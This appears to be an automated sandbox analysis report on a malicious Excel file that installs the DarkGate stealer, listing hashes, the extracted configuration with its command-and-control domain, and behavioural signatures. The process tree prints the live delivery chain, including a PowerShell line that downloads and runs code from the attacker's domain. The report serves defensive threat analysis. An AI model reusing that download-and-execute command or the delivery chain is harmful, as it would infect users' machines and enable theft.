Analysis
-
max time kernel
299s -
max time network
303s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
19-03-2024 17:55
Static task
static1
Behavioral task
behavioral1
Sample
march19-D7526-2024.xlsx
Resource
win7-20240221-en
General
-
Target
march19-D7526-2024.xlsx
-
Size
56KB
-
MD5
73adc9b2f25226f214f91ec8c2d413a8
-
SHA1
39f8eab6c1d56fff2b3e6eddf56d8d544ccae9ae
-
SHA256
a61448b1210aaaa33e398b1500701942ee2f4feb348420d628cc9d66974dfc31
-
SHA512
2169548500a7364c53f7180ada02ecdc85601d7b743b5b40ce9ba330e6fa296489594fc02a443c18bb0381aa100892b791affe02319f89ba1cc3a8c55f37a53f
-
SSDEEP
1536:Fkws9oLE3Ow6DyPgMUti9xx7bxNfI5ydaRLgIui3pqDyBROnlTF:FSoEOfEgMNdxI5yYhgu5zBRYx
Malware Config
Extracted
darkgate
admin888
badbutperfect.com
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
WZqqpfdY
-
minimum_disk
50
-
minimum_ram
4000
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 2 IoCs
resource yara_rule behavioral2/memory/2264-96-0x0000000003180000-0x00000000031F3000-memory.dmp family_darkgate_v6 behavioral2/memory/2264-98-0x0000000003180000-0x00000000031F3000-memory.dmp family_darkgate_v6 -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4940 5236 WScript.exe 88 Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3628 5236 WScript.exe 88 -
Blocklisted process makes network request 8 IoCs
flow pid Process 71 5528 powershell.exe 73 5528 powershell.exe 85 5528 powershell.exe 90 5528 powershell.exe 103 2076 powershell.exe 104 2076 powershell.exe 142 2076 powershell.exe 145 2076 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 2264 AutoHotkey.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AutoHotkey.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AutoHotkey.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5236 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 5528 powershell.exe 5528 powershell.exe 5528 powershell.exe 2076 powershell.exe 2076 powershell.exe 2076 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5528 powershell.exe Token: SeDebugPrivilege 2076 powershell.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 5236 EXCEL.EXE 5236 EXCEL.EXE 5236 EXCEL.EXE 5236 EXCEL.EXE 5236 EXCEL.EXE 5236 EXCEL.EXE 5236 EXCEL.EXE 5236 EXCEL.EXE 5236 EXCEL.EXE 5236 EXCEL.EXE 5236 EXCEL.EXE 5236 EXCEL.EXE 5236 EXCEL.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 5236 wrote to memory of 4940 5236 EXCEL.EXE 104 PID 5236 wrote to memory of 4940 5236 EXCEL.EXE 104 PID 4940 wrote to memory of 5528 4940 WScript.exe 105 PID 4940 wrote to memory of 5528 4940 WScript.exe 105 PID 5236 wrote to memory of 3628 5236 EXCEL.EXE 108 PID 5236 wrote to memory of 3628 5236 EXCEL.EXE 108 PID 3628 wrote to memory of 2076 3628 WScript.exe 109 PID 3628 wrote to memory of 2076 3628 WScript.exe 109 PID 5528 wrote to memory of 1160 5528 powershell.exe 115 PID 5528 wrote to memory of 1160 5528 powershell.exe 115 PID 2076 wrote to memory of 2264 2076 powershell.exe 116 PID 2076 wrote to memory of 2264 2076 powershell.exe 116 PID 2076 wrote to memory of 2264 2076 powershell.exe 116 PID 2076 wrote to memory of 4984 2076 powershell.exe 117 PID 2076 wrote to memory of 4984 2076 powershell.exe 117 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1160 attrib.exe 4984 attrib.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\march19-D7526-2024.xlsx"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5236 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\escuelademarina.com\cloud\AZURE_DOC_OPEN.vbs"2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'badbutperfect.com/nrwncpwo')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5528 -
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/rimz4⤵
- Views/modifies file attributes
PID:1160
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "\\escuelademarina.com\cloud\AZURE_DOC_OPEN.vbs"2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'badbutperfect.com/nrwncpwo')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\rimz\AutoHotkey.exe"C:\rimz\AutoHotkey.exe" script.ahk4⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2264
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/rimz4⤵
- Views/modifies file attributes
PID:4984
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5232
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD556c43715e0e7fa58012d8a5769d8d568
SHA14370ca3436f2e3a95b47a728503a2c22a5a5fa39
SHA2568ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5
SHA512b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed
-
Filesize
1KB
MD54906df08e7c6256d493c5d63ec475316
SHA191cddea276ddbd049b8e12d66e7fb25477acde76
SHA2561d43810f94dcb8ecc79b461664289a8adc95550d67ed6f426fd6b86623b3e259
SHA5120c110431e7368aa4b90fe762f073efaeaa948a471a2292058d72e140a408ad5bd0c9e845ce4060f97dba7f29eb899e6cf9b163b02544928dcb804c588d57d69c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
558KB
MD59c07463d836dbac6fde1de78052cfd22
SHA1d2c14d79cd002d6b1c159d9e665d2cfa501f9568
SHA256e7f2d87766e22baee7bb11b9496bce6d525921377f730c19e2637a60c27dda98
SHA5122f8d6dfa92f993d8860f6113122ce35fd04080c9c0fc0d3ff02a9511325c9aee1f36f144d19ac41b5ee5306c1462bbe01828c62f6e4989a98ee3f42ed891df13
-
Filesize
892KB
MD5a59a2d3e5dda7aca6ec879263aa42fd3
SHA1312d496ec90eb30d5319307d47bfef602b6b8c6c
SHA256897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb
SHA512852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030
-
Filesize
54KB
MD5f02f0bba1f1f678da41abafd02f4c545
SHA1c40b80bc4947d4ac52bc9c17d6d218b1fa9cd452
SHA2565aac7d31149048763e688878c3910ae4881826db80e078754f5d08f2c1f39572
SHA5128b56e388781a9fb855d8352f2cf175a7e0c5bb36bacd79be719ffa0c9f4c9f6e852bd460b6e9b0b7ea47ff38aa803e43a2366bf7a2686905c05bdd9e231b5b22
-
Filesize
915KB
MD54e1b052f107d2ee5321b44fc0e107638
SHA1679e1f8006a2d6ed61f0dbaf5e9d3cd252421cd4
SHA256a39dba6db04a85050ba7949881769f4b006b4a8edf691a605bfa5fe7c24d3489
SHA5125c4d1907ef2cbc894e8e33d268160a88e9db2d1a081676cba9d8fcfda4c120458a2ed90d44b2963accc842b03fac9bf231145d5991899bf6ab4871d9b65c2cb1